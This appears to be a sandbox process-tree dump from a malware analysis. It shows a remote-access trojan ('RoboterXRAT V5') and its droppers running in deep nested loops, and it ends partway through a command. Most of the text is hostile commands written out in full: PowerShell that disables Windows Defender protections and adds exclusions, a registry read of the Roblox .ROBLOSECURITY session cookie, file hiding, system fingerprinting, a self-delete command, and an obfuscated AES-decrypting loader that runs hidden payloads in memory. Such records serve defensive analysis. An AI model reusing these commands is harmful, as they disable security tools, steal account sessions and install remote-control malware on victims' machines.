        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        38⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        38⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        37⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        36⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        36⤵
        
        PID:3020
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:932
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        Views/modifies file attributes
        
        PID:544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        37⤵
        
        PID:2444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:3060
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        37⤵
        
        PID:2116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        37⤵
        
        PID:2072
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:1324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1636
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        37⤵
        Detects videocard installed
        
        PID:2852
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2124
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        38⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1988
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        35⤵
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        35⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        34⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        34⤵
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        33⤵
        
        PID:272
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        33⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        32⤵
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        31⤵
        
        PID:480
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        31⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        30⤵
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        30⤵
        
        PID:2900
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        28⤵
        
        PID:788
        
        C:\Windows\system32\net.exe
        
        net file
        29⤵
        
        PID:1484
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        30⤵
        
        PID:2248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        29⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:2848
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        27⤵
        
        PID:1220
        
        C:\Windows\system32\net.exe
        
        net file
        28⤵
        
        PID:2628
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        29⤵
        
        PID:1912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        28⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:1760
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        26⤵
        
        PID:2816
        
        C:\Windows\system32\net.exe
        
        net file
        27⤵
        
        PID:2108
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        28⤵
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        27⤵
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:492
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        30⤵
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        30⤵
        
        PID:1312
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        29⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        29⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        28⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        27⤵
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        27⤵
        
        PID:1860
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        25⤵
        
        PID:2072
        
        C:\Windows\system32\net.exe
        
        net file
        26⤵
        
        PID:2684
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        27⤵
        
        PID:1908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        26⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:1632
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        24⤵
        
        PID:1804
        
        C:\Windows\system32\net.exe
        
        net file
        25⤵
        
        PID:1396
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        26⤵
        
        PID:2040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:492
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:636
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        29⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        29⤵
        
        PID:352
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        28⤵
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        27⤵
        
        PID:2480
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        27⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        26⤵
        
        PID:1336
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        26⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        25⤵
        
        PID:2156
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        
        PID:1716
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        23⤵
        
        PID:2260
        
        C:\Windows\system32\net.exe
        
        net file
        24⤵
        
        PID:1660
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        25⤵
        
        PID:2744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:2620
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        25⤵
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        24⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        24⤵
        
        PID:236
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        22⤵
        
        PID:1952
        
        C:\Windows\system32\net.exe
        
        net file
        23⤵
        
        PID:1308
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        24⤵
        
        PID:2624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { 